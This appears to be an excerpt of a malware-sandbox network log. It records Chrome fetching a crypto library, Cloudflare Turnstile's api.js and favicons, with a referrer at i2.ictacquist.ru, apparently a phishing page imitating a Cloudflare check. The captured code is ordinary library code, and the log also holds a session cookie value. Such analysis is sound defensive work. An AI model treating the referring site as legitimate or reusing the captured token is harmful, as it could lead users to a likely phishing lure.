3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b
                                    Data Ascii: ;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[
                                    2025-02-19 19:40:08 UTC1369INData Raw: 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a
                                    Data Ascii: er,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:
                                    2025-02-19 19:40:08 UTC1369INData Raw: 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
                                    Data Ascii: charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNO
                                    2025-02-19 19:40:08 UTC1369INData Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68
                                    Data Ascii: (a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=th
                                    2025-02-19 19:40:08 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                    Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.649743104.16.2.1894431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:08 UTC596OUTGET /favicon.png HTTP/1.1
                                    Host: developers.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://i2.ictacquist.ru/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:08 UTC697INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:08 GMT
                                    Content-Type: image/png
                                    Content-Length: 937
                                    Connection: close
                                    Cache-Control: public, max-age=0, must-revalidate
                                    ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                    Set-Cookie: __cf_bm=R05RUdql971yFicuYwEXhWNy5BCz.KoHSl_DddWE.yw-1739994008-1.0.1.1-Xk3izrjUqKi9d.fq9X1AoshrY1_G1yF0hnhWRzSqjZDsZ8aFgI._RgsnW7tvaxM7l09Qmpp.VxOQYc5Vf6yWLw; path=/; expires=Wed, 19-Feb-25 20:10:08 GMT; domain=.developers.cloudflare.com; HttpOnly; Secure; SameSite=None
                                    Strict-Transport-Security: max-age=15552000; preload
                                    X-Content-Type-Options: nosniff
                                    access-control-allow-origin: *
                                    Server: cloudflare
                                    CF-RAY: 9148ba1a0f7442a3-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2025-02-19 19:40:08 UTC672INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                    Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
                                    2025-02-19 19:40:08 UTC265INData Raw: a0 09 1c 01 87 e4 9b b0 01 bd 5f 93 b5 e8 ca 40 13 68 01 2f 84 89 fb c2 c4 2e 16 2f 55 32 4e 64 f5 92 e4 8b e6 07 f8 2e f9 a6 f0 55 f2 05 7c 06 9f c0 7b d0 28 16 da cd ad 79 10 09 81 d7 60 0c 7c 04 e3 dc 02 7a 5c cd 06 7a d9 40 0b 6f 35 18 88 e1 2d 98 94 0b 4f f4 54 c6 54 4c 29 af 35 17 1d ce 79 b1 6d 0d 9d ab 96 0f 81 01 7a 5a e3 94 7f d8 81 b3 c7 bc c5 8b 12 f1 3a 1b b8 42 97 8a 69 0a e5 8e 77 ce 82 d2 eb 3f 21 0c f0 f6 6d 2d 78 69 f5 95 1f a6 e7 3b 9c 9e 0f 65 0c 30 c9 41 cc e1 1c 57 c7 7d bf ef 45 a6 b5 88 75 ff 0a ee e7 c8 cf 68 30 4f ad 2f c5 de df 82 55 df 00 6a 41 1d c4 ea 2c 20 a2 f3 7b 0f 28 fc ff 7f b1 f8 dd cf 5f 3d fe 77 23 bf 7e 8b c6 3c bd c1 67 0f 56 7a 91 a9 c6 c8 6f 40 1a 65 ce 9b fb 93 9b 1b b9 91 1b bf 01 83 32 f8 e3 ed 08 de 54 00 00
                                    Data Ascii: _@h/./U2Nd.U|{(y`|z\z@o5-OTTL)5ymzZ:Biw?!m-xi;e0AW}Euh0O/UjA, {(_=w#~<gVzo@e2T


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.649747104.18.95.414431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:08 UTC383OUTGET /turnstile/v0/g/0e3e6804b971/api.js HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:08 UTC471INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:08 GMT
                                    Content-Type: application/javascript; charset=UTF-8
                                    Content-Length: 48264
                                    Connection: close
                                    accept-ranges: bytes
                                    last-modified: Fri, 14 Feb 2025 14:12:08 GMT
                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                    access-control-allow-origin: *
                                    cross-origin-resource-policy: cross-origin
                                    Server: cloudflare
                                    CF-RAY: 9148ba1aadf85e86-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2025-02-19 19:40:08 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 79 3d 65 5b 6c 5d 28 67 29 2c 73 3d 79 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 79 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 6e 29 3b 66 75 6e 63 74
                                    Data Ascii: "use strict";(function(){function Ht(e,t,n,o,c,l,g){try{var y=e[l](g),s=y.value}catch(p){n(p);return}y.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,n=arguments;return new Promise(function(o,c){var l=e.apply(t,n);funct
                                    2025-02-19 19:40:08 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                    Data Ascii: e}function Sr(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function it(e,t){return t=t!=nu
                                    2025-02-19 19:40:08 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 71 74 28 65 29 7c 7c 7a 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 56 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                    Data Ascii: ray$/.test(n))return ot(e,t)}}function Se(e,t){return qt(e)||zt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var n={label:0,sent:function(){if(l[0
                                    2025-02-19 19:40:08 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                    Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(fu
                                    2025-02-19 19:40:08 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76
                                    Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ee||(ee={}));var ce;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ce||(ce={}));var Q;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(Q||(Q={}));v
                                    2025-02-19 19:40:08 UTC1369INData Raw: 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 4c 2e 4e 4f 52 4d 41 4c 2c 4c 2e 43 4f 4d 50 41 43 54 2c 4c 2e 49 4e 56 49 53 49 42 4c 45 2c 4c 2e 46 4c 45 58 49 42 4c 45 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 6b 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65
                                    Data Ascii: of e=="string"&&Nr.test(e)}function pt(e){return M([L.NORMAL,L.COMPACT,L.INVISIBLE,L.FLEXIBLE],e)}function vt(e){return M(["auto","manual","never"],e)}function mt(e){return M(["auto","manual","never"],e)}var kr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e
                                    2025-02-19 19:40:08 UTC1369INData Raw: 22 6e 62 2d 6e 6f 22 2c 22 6e 6c 2d 6e 6c 22 2c 22 70 6c 2d 70 6c 22 2c 22 70 74 2d 62 72 22 2c 22 74 68 2d 74 68 22 2c 22 74 72 2d 74 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 6e 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 6e 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 6e 2c 6f 2c 63 2c 6c 2c 67 2c 79 29 7b 76 61 72 20 73 3d 54 74 28 6e 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 68 3d 79 3f 22 3f
                                    Data Ascii: "nb-no","nl-nl","pl-pl","pt-br","th-th","tr-tr","ro-ro"];function Tt(e,t){var n="https://challenges.cloudflare.com";if(t){var o;n=(o=e["base-url"])!==null&&o!==void 0?o:n}return n}function Rt(e,t,n,o,c,l,g,y){var s=Tt(n,c),p=l?"h/".concat(l,"/"):"",h=y?"?
                                    2025-02-19 19:40:08 UTC1369INData Raw: 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 74 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65
                                    Data Ascii: s as a function")}function te(e,t){return te=Object.setPrototypeOf||function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Obje
                                    2025-02-19 19:40:08 UTC1369INData Raw: 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 63 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 71 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 7a 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c
                                    Data Ascii: ,{constructor:{value:c,enumerable:!1,writable:!0,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:qe(e)}function dr(e){var t=ze();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Refl
                                    2025-02-19 19:40:08 UTC1369INData Raw: 72 6d 61 6e 63 65 2e 6e 6f 77 3f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 76 61 72 20 53 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 67 2c 79 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 6c 3d 74 2e 70 61 72 61 6d 73 2e
                                    Data Ascii: rmance.now?performance.now():Date.now()}var St=function(e,t,n){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,g,y="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.649750104.16.2.1894431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:09 UTC527OUTGET /favicon.png HTTP/1.1
                                    Host: developers.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: __cf_bm=R05RUdql971yFicuYwEXhWNy5BCz.KoHSl_DddWE.yw-1739994008-1.0.1.1-Xk3izrjUqKi9d.fq9X1AoshrY1_G1yF0hnhWRzSqjZDsZ8aFgI._RgsnW7tvaxM7l09Qmpp.VxOQYc5Vf6yWLw
